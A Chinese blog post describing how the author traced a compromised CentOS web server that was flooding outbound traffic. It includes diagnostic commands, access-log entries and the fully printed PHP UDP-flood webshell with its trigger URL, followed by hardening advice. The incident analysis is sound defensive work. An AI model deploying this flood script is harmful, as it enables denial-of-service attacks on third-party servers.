记一次Centos服务器被挂马的抓马经历

今天早上五点，收到监控宝的警告短信，说是网站M无法访问了。睡的正香，再说网站所在系统是centos，重要数据每天都备份，应该很安全，也没有在意。倒头接着睡觉去了。

早上九点，机房负责人直接给我打来电话，说是全机房网络巨慢，单位的所有网站都打不开或打开的很慢。Centos服务器被挂马的一次抓马经历。

我赶紧赶了过去，查看了一下那里网络，发现175服务总是以50M/S速度向外发包，而175服务器正是网站M所在的服务器。

果断SSH连接175服务器，发现175服务器连接也很慢，连上之后top一下，查看cpu负载：

top

发现有两个apache进程占用cpu一直在40%以上，马上停止httpd 服务

service httpd stop

停止httpd服务之后，再看网络状态，175服务器也不向外发包了，一切正常。

由此判断应该是175服务器挂了马，疯狂向外发包，挤占了全部机房带宽。

下一步就是抓马了！

175服务器是有硬件防火墙，只开http80跟ssh22端口，ssh不太可能被盗号，应该是通过web漏洞挂马。早上5点才中招的，木马程序文件应该在1天之内。

切到M站点根目录之下，查找最近一天内变动的文件，执行

find ./ -mtime -1

果然，一个名为phzLtoxn.php的可疑文件出现在目录列表中。查看一下木马程序的创建者，执行

ls -l phzLtoxn.php

这里发现文件就没了，难道这文件还会自我销毁？Centos服务器被挂马的一次抓马经历

原来发生了一个小插曲，隔壁的管理员小黄也注意到这个文件，二话不说就删除了。我过去劈头批评教育了小黄一顿。见了木马程序就知道删删删删！难道木马程序不会再生成啊？你得顺藤摸瓜，不是一刀切。你得找到漏洞源头！删了没办法，再把httpd服务开启了，引狼入室，等等看能否再生成。

果然，半小时不到，新的phzLtoxn.PHP文件又生成了。查看了一下，文件创建者是apache,由此判断这肯定是通过网站漏洞上传的。

分析一下木马文件，看下黑客意图

这里贴出phzLtoxn.php文件源代码，并作了简单注释，仅作学习之用。

<?php
//设置脚本运行时间
set_time_limit(999999);
//攻击目标服务器ip
$host = $_GET['host'];
//攻击目标服务器端口
$port = $_GET['port'];
//攻击时长
$exec_time = $_GET['time'];
//每次发送字节数
$Sendlen = 65535;
$packets = 0;
//设置客户机断开不终止脚本的执行
ignore_user_abort(TRUE);
//step1. 目标服务器$host、端口$port、运行时长$exec_time有效性
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {  
 if (StrLen($_GET['rat']) <> 0) {    
 echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . GetHostByName($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_software'] . $_GET['rat'];    
 exit;  
 }  
 echo "Warning to: opening";  
 exit;
}
//step2. 设定发字符串$out,这里是“AAAAAAAAAA...”
for ($i = 0; $i < $Sendlen; $i++) {  
 $out .= "A";
}
$max_time = time() + $exec_time;
//step3. 进行攻击,使用udp向目标服务器狠狠发串串
while (1) {  
 $packets++;  
 if (time() > $max_time) {    
 break;  
 }  
 $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);  
 if ($fp) {    
 fwrite($fp, $out);    
 fclose($fp);  
 }
}
//step4. 攻击统计
echo "Send Host $host:$port<br><br>";
echo "Send Flow $packets * ($Sendlen/1024=" . round($Sendlen / 1024, 2) . ")kb / 1024 = " . round($packets * $Sendlen / 1024 / 1024, 2) . " mb<br><br>";
echo "Send Rate " . round($packets / $exec_time, 2) . " packs/s" . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . " mb/s";
?>

从以上代码可以看出，是个典型的ddos攻击代码。黑客应该是把我们服务器当傀儡使用，组织大量傀儡服务器疯狂向目标服务器发包。黑客只需要打开浏览器，敲入http://M站域名.com//phzLtoxn.php?host=x.x.x.x&port=xx&time=xx就可以对目标服务器进行ddos攻击了。

查看httpd日志，分析下攻击ip源，执行

tail /var/log/httpd/access.log | grep phzLtonxn.php
183.12.75.240 - - [10/Aug/2012:10:38:46 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:56 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:58 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:08 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:12 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:28 +0800] "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

发现源ip来自多个，目标服务器ip也有多个，都属于很多国家，有点奇怪啊，为什么黑客有针对性的攻击呢，无聊的黑客啊。
下一步，找漏洞！

1、重新审视了M站目录下文件权限。仅对几个必要的缓存、静态化的目录为apache开启了写权限，防止phzLtoxn.php文件再次生成。

2、重新开启httpd服务，使用360网站检测 http://webscan.360.cn/ 对H站进行漏洞检测，发现H站中有严重的远程执行漏洞，于是赶紧打了补丁。

3、补丁打好之后，顺便修改了系统用户、数据库用户、ftp用户的密码、M站系统用户密码。

观察几日之后，一切正常。

小结一下几个安全原则

1、权限最小化。

web目录一定做好权限，仅仅对apache开几个必要文件夹的写权限。

2、时刻注意补丁更新。

经常使用第三方的网站安全检测工具，如http://webscan.360.cn，也可参考十大安全评估工具，如果网站系统使用了第三方常用程序，多注意一下乌云漏洞平台的信息http://www.wooyun.org/。
3、中招后一定要补牢。

别光删删删删，要查找中招源头，分析黑客目的。

这是还是请大牛小牛们分析一下，为什么这帮黑客用那么多的肉鸡来ddos攻击不同的服务器，而这些被ddos攻击的服务器之间却没有什么联系。为什么攻击没有针对性？难道是为了耗带宽玩？！

# centos服务器挂马  # 阿里云Linux-CentOS系统下-搭建Git服务器详解  # CentOS服务器apache绑定多个域名的方法  # CentOS 7.2部署邮件服务器（Postfix）  # centos 搭建ftp服务器详解及简单介绍  # CentOS7修改服务器系统时间的方法  # CentOS上搭建PHP服务器环境的步骤与方法  # 阿里云基于CentOS用vsftpd搭建FTP服务器  # 几个  # 中招  # 向外  # 看了  # 多个  # 应该是  # 早上  # 第三方  # 你得  # 很慢  # 时长  # 小黄  # 仅对  # 这是  # 有什么  # 是个  # 也不  # 给我  # 也有  # 顺藤摸瓜 

相关文章： 在线ppt制作网站有哪些,请推荐几个好的课件下载的网站？  如何通过万网虚拟主机快速搭建网站？  企业网站制作费用多少,企业网站空间一般需要多大，费用是多少？  建站主机核心功能解析：服务器选择与网站搭建流程指南  如何在景安服务器上快速搭建个人网站？  武汉网站制作费用多少,在武汉武昌，建面100平方左右的房子，想装暖气片，费用大概是多少啊？  如何在万网自助建站平台快速创建网站？  如何高效配置香港服务器实现快速建站？  北京制作网站的公司排名,北京三快科技有限公司是做什么？北京三快科技？  开心动漫网站制作软件下载,十分开心动画为何停播？  魔方云NAT建站如何实现端口转发？  如何在万网主机上快速搭建网站？  建站之星安装模板失败：服务器环境不兼容？  电脑免费海报制作网站推荐,招聘海报哪个网站多？  Avalonia如何实现跨窗口通信 Avalonia窗口间数据传递  广州网站建站公司选择指南：建站流程与SEO优化关键词解析  建站之星与建站宝盒如何选择最佳方案？  制作宣传网站的软件,小红书可以宣传网站吗？  北京企业网站设计制作公司,北京铁路集团官方网站？  东莞专业制作网站的公司,东莞大学生网的网址是什么？  网站制作新手教程,新手建设一个网站需要注意些什么？  建站之星微信建站一键生成小程序+多端营销系统  怎么制作一个起泡网,水泡粪全漏粪育肥舍冬季氨气超过25ppm，可以有哪些措施降低舍内氨气水平？  南平网站制作公司,2025年南平市事业单位报名时间？  标准网站视频模板制作软件,现在有哪个网站的视频编辑素材最齐全的，背景音乐、音效等？  合肥制作网站的公司有哪些,合肥聚美网络科技有限公司介绍？  php能控制zigbee模块吗_php通过串口与cc2530 zigbee通信【介绍】  定制建站流程解析：需求评估与SEO优化功能开发指南  高端企业智能建站程序：SEO优化与响应式模板定制开发  如何通过.red域名打造高辨识度品牌网站？  深入理解Android中的xmlns:tools属性  电影网站制作价格表,那些提供免费电影的网站，他们是怎么盈利的？  已有域名如何免费搭建网站？  如何制作一个表白网站视频,关于勇敢表白的小标题？  韩国服务器如何优化跨境访问实现高效连接？  如何选择网络建站服务器？高效建站必看指南  c# await 一个已经完成的Task会发生什么  建站主机选虚拟主机还是云服务器更好？  制作网站的模板软件,网站怎么建设？  建站主机解析：虚拟主机配置与服务器选择指南  如何通过网站建站时间优化SEO与用户体验？  网站制作说明怎么写,简述网页设计的流程并说明原因？  黑客如何利用漏洞与弱口令入侵网站服务器？  图片制作网站免费软件,有没有免费的网站或软件可以将图片批量转为A4大小的pdf？  厦门模型网站设计制作公司,厦门航空飞机模型掉色怎么办？  建站之星多图banner生成与模板自定义指南  h5在线制作网站电脑版下载,h5网页制作软件？  宝塔面板创建网站无法访问？如何快速排查修复？  武汉网站设计制作公司,武汉有哪些比较大的同城网站或论坛，就是里面都是武汉人的？  平台云上自助建站如何快速打造专业网站？